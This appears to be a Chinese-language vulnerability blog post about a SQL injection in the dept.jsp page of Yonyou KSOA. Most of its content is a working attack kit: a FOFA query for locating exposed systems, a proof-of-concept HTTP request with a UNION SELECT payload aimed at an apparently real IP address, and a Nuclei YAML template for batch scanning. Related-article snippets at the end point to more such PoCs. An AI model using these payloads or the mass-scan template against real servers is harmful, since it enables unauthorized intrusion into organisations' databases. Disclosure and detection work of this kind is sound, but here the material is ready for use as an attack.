首页 > 数据库 >用友时空KSOA dept.jsp SQL注入漏洞

用友时空KSOA dept.jsp SQL注入漏洞

时间:2023-10-19 22:35:51浏览次数:40  
标签:漏洞 KSOA dept jsp 用友 时空

漏洞简介

用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
系统dept.jsp文件中参数存在SQL注入漏洞

影响版本

用友时空 KSOA v9.0 v8.3

漏洞复现

fofa语法:app="用友-时空KSOA"
登录页面如下:

POC:

GET /common/dept.jsp?deptid=1%27%20UNION%20ALL%20SELECT%2060%2Csys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27%2C%2712345%27))-- HTTP/1.1
Host: 101.75.85.36:8098
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close

批量yaml文件

id: yonyou_KOSA_dept_sqli
info:
  name: 用友时空KSOA dept.jsp SQL注入漏洞
  author: mhb17
  severity: info
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |+
        GET /common/dept.jsp?deptid=1%27%20UNION%20ALL%20SELECT%2060%2Csys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27%2C%2712345%27))-- HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '827ccb0eea8a706c4c34a16891f84e7'
      - type: word
        part: header
        words:
          - '200'

标签:漏洞,KSOA,dept,jsp,用友,时空
From: https://www.cnblogs.com/pursue-security/p/17775843.html

相关文章

  • 用友GRP-RMIS datalist.jsp SQL注入漏洞
    漏洞描述用友GRP-RMIS系统的datalist.jsp存在sql注入漏洞漏洞复现fofa语法:app="用友-GRP-RMIS系统"系统登录页面如下:POC:POST/datalist.jspHTTP/1.1Host:xxxxUser-Agent:python-requests/2.31.0Accept-Encoding:gzip,deflateAccept:*/*Connection:closeConten......
  • vue2和vue3导出页面为PDF格式:jspdf和html2canvas
    一、vue2导出PDF使用步骤1、安装html2canvas,将页面html转换成图片npminstall--savehtml2canvas卸载:npmuninstallhtml2canvas指定版本安装:[email protected]、安装jspdf,将图片生成pdfnpminstalljspdf--save3、定义全局函数在指......
  • jeecg中jsp页面合计问题
    问题:在一个tbody下,如何数量和价格,合计出单项的金额,同时在最下面合计出总金额 页面的jsp代码如下: <tableborder="0"cellpadding="2"cellspacing="0"id="bgLwg_table"><trbgcolor="#E6E6E6"><tdalign="center&......
  • IDEA 出现 Cannot resolve method getParameter() in JSP 解决方法
    原链接java-CannotresolvemethodgetParameter()inJSP-StackOverflowIDEA中出现下图情况,版本IDEA2022.2.3。此方法大概率可用,如果帮到你请点个赞吧~  1.我们右键当前项目,选择进入"OpenModuleSettings",如下图2.进入下图界面后,点击下图加号弹出二级菜单,在通......
  • javaweb-jsp脚本总结笔记
    1什么是JSPjsp又叫JavaserveltPage这门技术最大的特点就是,写jsp就像是再写html但是不仅可以写静态页面,而且可以内置Java代码写出动态页面,也就是说可以为用户提供动态数据。总的来说jsp=java+HTML2.JSP快速入门2.1提供对应的驱动包2.1创建对应jsp文件2.2写对应代码......
  • 论文阅读:CLIP2Point: Transfer CLIP to Point Cloud Classification with Image-Depth
    CLIP2Point:TransferCLIPtoPointCloudClassificationwithImage-DepthPre-TrainingCLIP2Point:通过图像深度预训练将CLIP传输到点云分类  ICCV2023摘要由于训练数据有限,3D视觉和语言的预训练仍在开发中。最近的工作尝试将视觉语言(V-L)预训练方法转移到3D视觉。然而,3D......
  • Servlet/JSP
    Servlet/JSPIDEA配置然后可以看到默认给你一个HelloWorld然后注意端口占用的问题HelloWorld项目源码index.jsp(src/main/webapp/WEB-INF/index.jsp)<%@pagecontentType="text/html;charset=UTF-8"pageEncoding="UTF-8"%><!DOCTYPEhtml><html>......
  • 10.9 ,jsp连接数据库完成课程信息导入
    跟随教学视频安装好mysql,jdbc,navicat,apacheTomocat,为tomocat配好环境变量,在idea中完成配置工件,连入数据库驱动等可以通过idea去查看数据库,也可以借助navicat,以下是代码部分,两个web下的jsp文件,一个负责HTML的页面实现,另一个负责数据库的内容添加以及判断。<%@pageimport="......
  • 【webapp】jsp EL 的基本语法和用法
    EL(表达式语言)是用于在JSP页面中访问和操作数据的简洁表达式语言。EL提供了一种简化和统一的方式来访问变量、属性、集合和其他对象。以下是EL的基本语法和用法:基本语法:${expression}:用于在JSP页面中嵌入EL表达式。${object.property}:访问对象的属性。${map.key}:访......
  • 【webapp】jsp 操作数据库
    在JSP中连接和操作数据库需要使用Java的JDBC(JavaDatabaseConnectivity)API。下面是学习在JSP中使用JDBC连接和操作数据库的基本步骤:导入JDBC驱动程序:下载并导入适合您所使用的数据库的JDBC驱动程序JAR文件。不同的数据库有不同的驱动程序。将JDBC驱动程......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99